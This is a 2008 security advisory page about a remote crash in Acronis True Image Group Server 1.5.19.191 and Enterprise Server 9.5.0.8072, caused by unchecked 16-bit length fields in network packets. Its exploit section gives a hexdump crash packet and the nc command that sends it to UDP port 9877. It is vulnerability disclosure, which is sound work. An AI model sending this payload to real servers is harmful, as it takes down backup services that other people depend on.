Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs  Black Box Testing  Vulnerability Assessment  Vulnerability Scanner SecuriTeam™ in Your Inbox   E-mail this article to a friend New vulnerability? New tool? Tell us	Acronis True Image Group Server Invalid Memory Access 10 Mar. 2008    Summary Acronis Group Server is a component of Acronis True Image Echo Server (Workstation and Enterprise packages) which "allows the viewing and managing of backup tasks for all systems in the network from the Acronis Management Console". A vulnerability in the way the Acronis True Image Group Server handles network based data allows remote attackers to cause the product to crash.   Credit: The information has been provided by Luigi Auriemma. The original article can be found at: http://aluigi.altervista.org/adv/acrogroup-adv.txt    Details Audit your web server for security holes - see what the hackers see. Sign up for a scan today - risk free! Vulnerable Systems:  * Acronis True Image Group Server version 1.5.19.191  * Acronis True Image Enterprise Server version 9.5.0.8072 The packets used by this server contain some 16 bit fields which specify the length of the subsequent data. The problem is that the memory assigned for each packet is about 2048 bytes so the server allocates the amount of memory specified by that field and then tries to copy the data from the packet into this new buffer with the subsequent crash of the service due to the invalid read access. Exploit: The following hexdump will cause the server to crash: 0000000 ffff 0001 ffff ffff ffff ffff 0029 ffff 0000010 002a 0000 ffff ffff ffff ffff ffff ffff 0000020 ffff ffff ffff ffff ffff ffff ffff ffff * 0000800 When sent with the following command:   nc SERVER 9877 -v -v -u -p 9876 < acrogroup.txt  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks Kyocera Mita Scanner File Utility (Multiple) Novell iPrint Client ActiveX Control Multiple Vulnerabilities DriveCrypt Security Model Bypass and Incorrect BIOS API Usage Windows Media Services (nskey.dll) CallHTMLHelp Buffer Overflow Trend Micro Products Web Management Authentication Bypass Anzio Web Print Object Buffer Overflow Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass (MS08-043) Microsoft Windows Messenger Illegal Access Vulnerability (MS08-050) MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface Symantec Veritas Storage Foundation Scheduler Service NULL Session Authentication Bypass Vulnerability Vulnerability in Cisco WebEx Meeting Manager ActiveX Control Cumulative Security Update for Internet Explorer (MS08-045) Vulnerability in Microsoft Word Allows Code Execution (MS08-042) Vulnerability in the Snapshot Viewer ActiveX Control for Microsoft Access Allows Code Execution (MS08-041)  Featured Articles Microsoft ASP.NET ValidateRequest Filters Bypassing Allows XSS And HTML Injection Attacks vBulletin Cross Site Scripting Vulnerability (popup) Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass (MS08-043) MicroWorld MailScan - Multiple Vulnerabilities within Admin-Webinterface Sun xVM VirtualBox Privilege Escalation Vulnerability Vulnerabilities in DNS Allows Spoofing (MS08-037) Vulnerabilities in Microsoft SQL Server Allows Elevation of Privilege (MS08-040)
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2008 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®